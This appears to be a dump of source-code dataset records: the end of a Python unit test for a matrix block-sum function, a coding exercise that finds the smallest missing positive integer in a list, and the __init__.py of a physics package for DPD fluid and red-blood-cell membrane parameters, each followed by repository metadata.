    # permutation of the rows, which is too weak a check for a matrix result.
    t.assertEqual([[12,21,16],[27,45,33],[24,39,28]],
                  s.matrixBlockSum([[1,2,3],[4,5,6],[7,8,9]], 1))
    t.assertEqual([[45,45,45],[45,45,45],[45,45,45]],
                  s.matrixBlockSum([[1,2,3],[4,5,6],[7,8,9]], 2))
print("OK!")
|
[
"[email protected]"
] | |
17fe19b4e80f15be0aa96d6afc0197167630396f
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/Yfksxs7kyJf6B3yvK_21.py
|
3d96e93dc0ddaedcb2d4e9ec9ecf8a4618a5d7cd
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,234 |
py
|
"""
Given a list of integers, return the smallest _positive_ integer _not present
in the list_.
Here is a representative example. Consider the list:
[-2, 6, 4, 5, 7, -1, 7, 1, 3, 6, 6, -2, 9, 10, 2, 2]
After reordering, the list becomes:
[-2, -2, -1, 1, 2, 2, 3, 4, 5, 6, 6, 6, 7, 7, 9, 10]
... from which we see that the smallest missing positive integer is `8`.
### Examples
min_miss_pos([-2, 6, 4, 5, 7, -1, 1, 3, 6, -2, 9, 10, 2, 2]) ➞ 8
# After sorting, list becomes [-2, -2, -1, 1, 2, 2, 3, 4, 5, 6, 6, 7, 9, 10]
# So the smallest missing positive integer is 8
min_miss_pos([5, 9, -2, 0, 1, 3, 9, 3, 8, 9]) ➞ 2
# After sorting, list becomes [-2, 0, 1, 3, 3, 5, 8, 9, 9, 9]
# So the smallest missing positive integer is 2
min_miss_pos([0, 4, 4, -1, 9, 4, 5, 2, 10, 7, 6, 3, 10, 9]) ➞ 1
# After sorting, list becomes [-1, 0, 2, 3, 4, 4, 4, 5, 6, 7, 9, 9, 10, 10]
# So the smallest missing positive integer is 1
### Notes
For the sake of clarity, recall that `0` is not considered to be a positive
number.
"""
def min_miss_pos(lst):
    # The answer can never exceed len(lst) + 1, so a bounded range suffices
    # (the original used range(1, 2 << 64) as a stand-in for an infinite loop).
    for i in range(1, len(lst) + 2):
        if i not in lst:
            return i
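# Alternative sketch (added, not part of the original file): membership tests
# against a list are O(n) each, so the loop above is O(n^2) in the worst case.
# Probing a set instead gives expected O(n) overall; `min_miss_pos_set` is a
# hypothetical helper name used only for illustration.
def min_miss_pos_set(lst):
    seen = set(lst)
    i = 1
    while i in seen:
        i += 1
    return i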
|
[
"[email protected]"
] | |
ce23796651ea87049745a818cb08caafa35cc580
|
9eef3e4cf39a659268694cf08a4a799af8fb13e2
|
/packages/dpdprops/dpdprops/__init__.py
|
c42c51871769928dd028add49df137aafa25b487
|
[] |
no_license
|
cselab/tRBC-UQ
|
c30ec370939b949c989d2e9cd30137073b53e7d2
|
cd7711b76c76e86bc6382914111f4fa42aa78f2c
|
refs/heads/master
| 2023-04-18T03:06:49.175259 | 2022-10-25T15:45:07 | 2022-10-25T15:45:07 | 483,407,531 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 954 |
py
|
from .fluid import *
from .dpdparams import (DPDParams,
create_dpd_params_from_str,
create_dpd_params_from_Re_Ma,
create_dpd_params_from_props)
from .membrane import *
from .membraneparams import (MembraneParams,
KantorParams,
JuelicherParams,
WLCParams,
LimParams,
DefaultRBCParams,
KantorWLCRBCDefaultParams,
JuelicherLimRBCDefaultParams)
from .membraneforces import (extract_dihedrals,
compute_kantor_energy,
compute_juelicher_energy)
from .fsi import (get_gamma_fsi_DPD_membrane,
create_fsi_dpd_params)
from .rbcmesh import (load_stress_free_mesh,
load_equilibrium_mesh)
|
[
"[email protected]"
] |